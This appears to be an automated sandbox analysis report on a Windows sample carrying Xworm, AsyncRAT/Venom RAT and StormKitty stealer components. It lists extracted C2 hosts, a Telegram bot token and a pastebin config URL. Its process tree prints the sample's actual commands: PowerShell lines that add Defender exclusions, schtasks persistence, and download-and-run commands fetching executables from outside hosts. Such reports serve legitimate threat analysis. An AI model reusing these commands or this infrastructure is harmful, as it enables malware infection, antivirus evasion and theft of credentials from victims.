Analysis
-
max time kernel
152s -
max time network
165s -
platform
windows10-2004_x64 -
resource
win10v2004-20240412-en -
resource tags
arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system -
submitted
18-04-2024 01:36
Behavioral task
behavioral1
Sample
87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe
Resource
win10v2004-20240412-en
General
-
Target
87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe
-
Size
167KB
-
MD5
d0685487fa7e474e68a40a1b1ff49b60
-
SHA1
069285708e07814d852bbd5f39a7ffbb3c9e2d94
-
SHA256
87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6
-
SHA512
eda00ba1453a33024fc05316196ccd71981ba61ababb965d1c3f01251f377047b00d8b6a9b140acf335cfa9d478bb3b6dbc4aca37fe74cfecb929e965ed190a8
-
SSDEEP
1536:216oQ/DtPFVzE95jNNKCw5VY9bG1wWQkAw6JOXHWIOGoWIFjo7xLFVGy9w04xJXX:ouxFG9Rw3Y9bGVAfOXWxrjCT4
Malware Config
Extracted
http://xcu.exgaming.click
Extracted
http://xcu5.exgaming.click
Extracted
xworm
dentiste.ddns.net:7000
86.68.222.14:7000
51.254.53.24:7000
-
Install_directory
%AppData%
-
install_file
Mise à jour carte CPS.exe
-
telegram
https://api.telegram.org/bot5720516014:AAF4KOAv3GXHFU0RS3g4HPsucKDwQf01__A
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
Default
hoyqzolrquxmbnzaee
-
delay
1
-
install
true
-
install_file
system.exe
-
install_folder
%AppData%
-
pastebin_config
https://pastebin.com/raw/ckrnc4Uk
Signatures
-
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
Processes:
resource yara_rule behavioral2/memory/4196-83-0x000000001C4C0000-0x000000001C4CE000-memory.dmp disable_win_def -
Detect Xworm Payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/4196-0-0x0000000000050000-0x0000000000080000-memory.dmp family_xworm C:\Users\Admin\AppData\Roaming\Mise à jour carte CPS.exe family_xworm -
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/4196-92-0x000000001E1E0000-0x000000001E300000-memory.dmp family_stormkitty -
Async RAT payload 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\xoxmpc.exe family_asyncrat -
Detects Windows executables referencing non-Windows User-Agents 2 IoCs
Processes:
resource yara_rule behavioral2/memory/4196-0-0x0000000000050000-0x0000000000080000-memory.dmp INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA C:\Users\Admin\AppData\Roaming\Mise à jour carte CPS.exe INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA -
Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers. 1 IoCs
Processes:
resource yara_rule behavioral2/memory/4196-93-0x000000001B880000-0x000000001B88E000-memory.dmp INDICATOR_SUSPICIOUS_Binary_References_Browsers -
Detects executables attemping to enumerate video devices using WMI 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\xoxmpc.exe INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice behavioral2/memory/1412-97-0x0000000000920000-0x0000000000938000-memory.dmp INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice -
Detects executables containing artifacts associated with disabling Widnows Defender 1 IoCs
Processes:
resource yara_rule behavioral2/memory/4196-83-0x000000001C4C0000-0x000000001C4CE000-memory.dmp INDICATOR_SUSPICIOUS_DisableWinDefender -
Detects executables embedding registry key / value combination indicative of disabling Windows Defender features 1 IoCs
Processes:
resource yara_rule behavioral2/memory/4196-83-0x000000001C4C0000-0x000000001C4CE000-memory.dmp INDICATOR_SUSPICIOUS_EXE_RegKeyComb_DisableWinDefender -
Detects executables referencing Windows vault credential objects. Observed in infostealers 1 IoCs
Processes:
resource yara_rule behavioral2/memory/4196-92-0x000000001E1E0000-0x000000001E300000-memory.dmp INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID -
Detects executables referencing credit card regular expressions 1 IoCs
Processes:
resource yara_rule behavioral2/memory/4196-92-0x000000001E1E0000-0x000000001E300000-memory.dmp INDICATOR_SUSPICIOUS_EXE_CC_Regex -
Detects executables using Telegram Chat Bot 2 IoCs
Processes:
resource yara_rule behavioral2/memory/4196-0-0x0000000000050000-0x0000000000080000-memory.dmp INDICATOR_SUSPICIOUS_EXE_TelegramChatBot C:\Users\Admin\AppData\Roaming\Mise à jour carte CPS.exe INDICATOR_SUSPICIOUS_EXE_TelegramChatBot -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exexoxmpc.exesystem.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3198953144-1466794930-246379610-1000\Control Panel\International\Geo\Nation 87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe Key value queried \REGISTRY\USER\S-1-5-21-3198953144-1466794930-246379610-1000\Control Panel\International\Geo\Nation xoxmpc.exe Key value queried \REGISTRY\USER\S-1-5-21-3198953144-1466794930-246379610-1000\Control Panel\International\Geo\Nation system.exe -
Drops startup file 2 IoCs
Processes:
87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Mise à jour carte CPS.lnk 87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Mise à jour carte CPS.lnk 87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe -
Executes dropped EXE 4 IoCs
Processes:
Mise à jour carte CPS.exexoxmpc.exesystem.exeMise à jour carte CPS.exepid process 3132 Mise à jour carte CPS.exe 1412 xoxmpc.exe 2436 system.exe 2212 Mise à jour carte CPS.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3198953144-1466794930-246379610-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Mise à jour carte CPS = "C:\\Users\\Admin\\AppData\\Roaming\\Mise à jour carte CPS.exe" 87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 4140 schtasks.exe 744 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 3932 timeout.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exepid process 4196 87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exe87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exepowershell.exexoxmpc.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exesystem.exepid process 1192 powershell.exe 1192 powershell.exe 3944 powershell.exe 3944 powershell.exe 4160 powershell.exe 4160 powershell.exe 5108 powershell.exe 5108 powershell.exe 4196 87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe 2200 powershell.exe 2200 powershell.exe 1412 xoxmpc.exe 1412 xoxmpc.exe 1412 xoxmpc.exe 1412 xoxmpc.exe 1412 xoxmpc.exe 1412 xoxmpc.exe 1412 xoxmpc.exe 1412 xoxmpc.exe 1412 xoxmpc.exe 1412 xoxmpc.exe 1412 xoxmpc.exe 1412 xoxmpc.exe 1412 xoxmpc.exe 1412 xoxmpc.exe 1412 xoxmpc.exe 1268 powershell.exe 1412 xoxmpc.exe 1412 xoxmpc.exe 1412 xoxmpc.exe 1412 xoxmpc.exe 1412 xoxmpc.exe 1412 xoxmpc.exe 1412 xoxmpc.exe 1412 xoxmpc.exe 1412 xoxmpc.exe 1412 xoxmpc.exe 1412 xoxmpc.exe 1412 xoxmpc.exe 1268 powershell.exe 1412 xoxmpc.exe 1412 xoxmpc.exe 4964 powershell.exe 4964 powershell.exe 2256 powershell.exe 2256 powershell.exe 2964 powershell.exe 2964 powershell.exe 1784 powershell.exe 1784 powershell.exe 2436 system.exe 2436 system.exe 2436 system.exe 2436 system.exe 2436 system.exe 2436 system.exe 2436 system.exe 2436 system.exe 2436 system.exe 2436 system.exe 2436 system.exe 2436 system.exe 2436 system.exe 2436 system.exe -
Suspicious use of AdjustPrivilegeToken 20 IoCs
Processes:
87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exepowershell.exepowershell.exepowershell.exepowershell.exeMise à jour carte CPS.exexoxmpc.exepowershell.exepowershell.exepowershell.exepowershell.exesystem.exepowershell.exepowershell.exepowershell.exepowershell.exeMise à jour carte CPS.exedescription pid process Token: SeDebugPrivilege 4196 87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe Token: SeDebugPrivilege 1192 powershell.exe Token: SeDebugPrivilege 3944 powershell.exe Token: SeDebugPrivilege 4160 powershell.exe Token: SeDebugPrivilege 5108 powershell.exe Token: SeDebugPrivilege 4196 87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe Token: SeDebugPrivilege 3132 Mise à jour carte CPS.exe Token: SeDebugPrivilege 1412 xoxmpc.exe Token: SeDebugPrivilege 2200 powershell.exe Token: SeDebugPrivilege 1412 xoxmpc.exe Token: SeDebugPrivilege 1268 powershell.exe Token: SeDebugPrivilege 4964 powershell.exe Token: SeDebugPrivilege 2256 powershell.exe Token: SeDebugPrivilege 2436 system.exe Token: SeDebugPrivilege 2964 powershell.exe Token: SeDebugPrivilege 1784 powershell.exe Token: SeDebugPrivilege 2436 system.exe Token: SeDebugPrivilege 968 powershell.exe Token: SeDebugPrivilege 1056 powershell.exe Token: SeDebugPrivilege 2212 Mise à jour carte CPS.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exesystem.exepid process 4196 87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe 2436 system.exe -
Suspicious use of WriteProcessMemory 42 IoCs
Processes:
87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exexoxmpc.execmd.execmd.execmd.exesystem.execmd.exedescription pid process target process PID 4196 wrote to memory of 1192 4196 87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe powershell.exe PID 4196 wrote to memory of 1192 4196 87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe powershell.exe PID 4196 wrote to memory of 3944 4196 87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe powershell.exe PID 4196 wrote to memory of 3944 4196 87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe powershell.exe PID 4196 wrote to memory of 4160 4196 87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe powershell.exe PID 4196 wrote to memory of 4160 4196 87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe powershell.exe PID 4196 wrote to memory of 5108 4196 87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe powershell.exe PID 4196 wrote to memory of 5108 4196 87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe powershell.exe PID 4196 wrote to memory of 4140 4196 87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe schtasks.exe PID 4196 wrote to memory of 4140 4196 87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe schtasks.exe PID 4196 wrote to memory of 1412 4196 87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe xoxmpc.exe PID 4196 wrote to memory of 1412 4196 87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe xoxmpc.exe PID 1412 wrote to memory of 4332 1412 xoxmpc.exe cmd.exe PID 1412 wrote to memory of 4332 1412 xoxmpc.exe cmd.exe PID 4332 wrote to memory of 2200 4332 cmd.exe powershell.exe PID 4332 wrote to memory of 2200 4332 cmd.exe powershell.exe PID 4332 wrote to memory of 1268 4332 cmd.exe powershell.exe PID 4332 wrote to memory of 1268 4332 cmd.exe powershell.exe PID 1412 wrote to memory of 404 1412 xoxmpc.exe cmd.exe PID 1412 wrote to memory of 404 1412 xoxmpc.exe cmd.exe PID 1412 wrote to memory of 3492 1412 xoxmpc.exe cmd.exe PID 1412 wrote to memory of 3492 1412 xoxmpc.exe cmd.exe PID 404 wrote to memory of 744 404 cmd.exe schtasks.exe PID 404 wrote to memory of 744 404 cmd.exe schtasks.exe PID 3492 wrote to memory of 3932 3492 cmd.exe timeout.exe PID 3492 wrote to memory of 3932 3492 cmd.exe timeout.exe PID 4332 wrote to memory of 4964 4332 cmd.exe powershell.exe PID 4332 wrote to memory of 4964 4332 cmd.exe powershell.exe PID 4332 wrote to memory of 2256 4332 cmd.exe powershell.exe PID 4332 wrote to memory of 2256 4332 cmd.exe powershell.exe PID 3492 wrote to memory of 2436 3492 cmd.exe system.exe PID 3492 wrote to memory of 2436 3492 cmd.exe system.exe PID 2436 wrote to memory of 3620 2436 system.exe cmd.exe PID 2436 wrote to memory of 3620 2436 system.exe cmd.exe PID 3620 wrote to memory of 2964 3620 cmd.exe powershell.exe PID 3620 wrote to memory of 2964 3620 cmd.exe powershell.exe PID 3620 wrote to memory of 1784 3620 cmd.exe powershell.exe PID 3620 wrote to memory of 1784 3620 cmd.exe powershell.exe PID 3620 wrote to memory of 968 3620 cmd.exe powershell.exe PID 3620 wrote to memory of 968 3620 cmd.exe powershell.exe PID 3620 wrote to memory of 1056 3620 cmd.exe powershell.exe PID 3620 wrote to memory of 1056 3620 cmd.exe powershell.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe"C:\Users\Admin\AppData\Local\Temp\87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe"1⤵
- Checks computer location settings
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Mise à jour carte CPS.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Mise à jour carte CPS.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Mise à jour carte CPS" /tr "C:\Users\Admin\AppData\Roaming\Mise à jour carte CPS.exe"2⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\xoxmpc.exe"C:\Users\Admin\AppData\Local\Temp\xoxmpc.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"' & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"'4⤵
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp1AD1.tmp.bat""3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\timeout.exetimeout 34⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Roaming\system.exe"C:\Users\Admin\AppData\Roaming\system.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\Mise à jour carte CPS.exe"C:\Users\Admin\AppData\Roaming\Mise à jour carte CPS.exe"1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\Mise à jour carte CPS.exe"C:\Users\Admin\AppData\Roaming\Mise à jour carte CPS.exe"1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Mise à jour carte CPS.exe.logFilesize
654B
MD52ff39f6c7249774be85fd60a8f9a245e
SHA1684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA5121d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD56e722800abdc44fc1ce4688ca490118f
SHA1f64a4ff6d6e9b567151260fbaa543c345565de3b
SHA256e63cad15f591e7898953167aa4ff8960500a177ad1bfa5e30229793b8b0af7e4
SHA5125b4f0da0561a1cc5f36bad93b1f0d9ce225e86464a4d1a5dbefe5eac8e339420446c9300b1362992b06838a302a8172944557e2c202bf980f5a22b98b9bea13b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD57825839543f6b3c710e1ab92dbe7f1ec
SHA1d43188bca6dd2038abf40282e497ee1d4c626f18
SHA2569fd6127316a4700789c6c0d93b62c3523e1245ae2d0180c91b0a4f39a80ccfd7
SHA512aded824aec597a82736866bbbd44750f5b698b3408dfdb48979bd3d2638a1b4efd66ad00384bfc323275ff8f971cb85c80e00206201671f455c2870d9c27cb22
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5d8836c0315d56105d43f002e992524f7
SHA1d1297b4a079838bac77840d677414c09710cca17
SHA25641385f2cb42b41f060b51e83de3c70ec8a7fd07700e44b7450c6a603578030e0
SHA512342ed7a766c2e38d331f7026ab62dd6711e2b1644bf60a4742a38a37db4c14d150d9f408c94ab93bd7254b23ea022dc05635e0e06ea3840514c3bac833f4b501
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5dd0e89eb06376648b6721ad5c3cd8f48
SHA104ecbc9e78c27a0ff25eeea95f45bae1ae3cc70b
SHA25649aefa0ad54df58c06757e99015e9be5db27ade38108da2e864f6485ef8e4fd2
SHA5124132dd1e80d81c40648cf0475858075d79234a86352579933bdc697ab2f2f2f6107a1a0397caef27563592307e564c8e62c09c3f14fca323b157748713011291
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD583684a616885de4c1e9413ebd4a00bf4
SHA13f97fd7910fa0de20c18c9d17f454595fade8eb0
SHA2565abc3dff344d8f19fbad3274354ace5ce41dca82abb1a85b6937883ce052b617
SHA512da6107926221ac64fcb6392a9f0f6b9d09c18a89aadd5738d7613c59c25d9faad253fb7edb6e8eda4e2f5f08e07152ddbd067e6d7fae8fffb67f18b2dfa0dfae
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD548750759a6c508e64c9fa9a56f25fb68
SHA12d885553d73940cc07d11c13c2fbc7d35a8ade91
SHA25606dbc75345d44373cf0657a2e2bea0dd957e921cc32e8350ca36b1efb0ef0368
SHA51239161378f31d95a016db63c332e69478aa51ad9cefa02472b5418f4680803f619ced4c638045fb54ffd0e3a5c95876e045c5a2fb50097b168f8be3f83dcba06b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5a789e2ae2e0515279062eeaeba00deb0
SHA1a2ce26255d067b3a01e7ac4b971173ac2369ed15
SHA2564acafdb79f135612dc23c8f158b094804bfe7f9c968c20dec74a36b217819d61
SHA512be81d07c81fc89ec7bb8834dc9334e1fbe10acced0be0e49a8ec4af4bc476be2001782446ae466a46e86d670b1336b3f9b956a84cb45c255668b9462caaaf113
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD5d28a889fd956d5cb3accfbaf1143eb6f
SHA1157ba54b365341f8ff06707d996b3635da8446f7
SHA25621e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA5120b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD5adabeb4ab5727937b41a82146fefd87f
SHA161429310f8374b1b752d74572b8512d695979493
SHA25614d3b1cadf88259544cec7202902a061821b12fae3ebfaa76a03e646710eb485
SHA512057ac7df07610fa4d111642dc6dc08c391be7b38f5a35bac7bb6c8345983df4d0b5f4a09ff534f9cddc24577f920e3a14b2fece8e71489c5c52254eaf25cf9c8
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD5a0847a1f912ef989f2b3497b28c41b46
SHA1265ddd27c8fc985ab891472b5ef208d636ccfd8b
SHA256774edb0a31714fd00aed4c384fe9cf97f6d97b02bf70505355ada4e49b9db4fd
SHA512414f11e4addd81f1ff9e4d64d464b5f027e7ef45ee470178569bf27b54e69e2f00c0e38d8843d3e312432d7f03546271812433c5e617f5b6820ff306303e1af5
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_phkrjhpb.yzv.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\tmp1AD1.tmp.batFilesize
150B
MD5fa8827eed9b3556b8990d00b41feb7bb
SHA170210b96cbee4e10397b76651dd930a7a31340b7
SHA25625dce0cc5288582592573f454962e8b79894c325396d4c15430056a93be2dc8b
SHA512d814d246afefb5547c6c1df49c7361eecc8e24ec772e00bee1a6ae666332b0917ed03b0700f8362850d2c91f59d4e8411b3c472b9f735db45b67d4fa364c44c2
-
C:\Users\Admin\AppData\Local\Temp\xoxmpc.exeFilesize
75KB
MD5a7d63348cfe9b0dc9d3aaec28c76c8f0
SHA11b993f554960286e90cfd7cedf4c457e1c46ff80
SHA25616686f1e7563cc54a0d047a1033456f84d918f6f93f0bbca7cb440925f1eeb54
SHA5123910836ccae023d562c66bfd754b0d1e3aadc4c1cbf57e96e8220c1de6534a529ec3630d595a7baba7c56ca503b6ce6d012b9c388b9f896f2a0a8be317ca5010
-
C:\Users\Admin\AppData\Roaming\Mise à jour carte CPS.exeFilesize
167KB
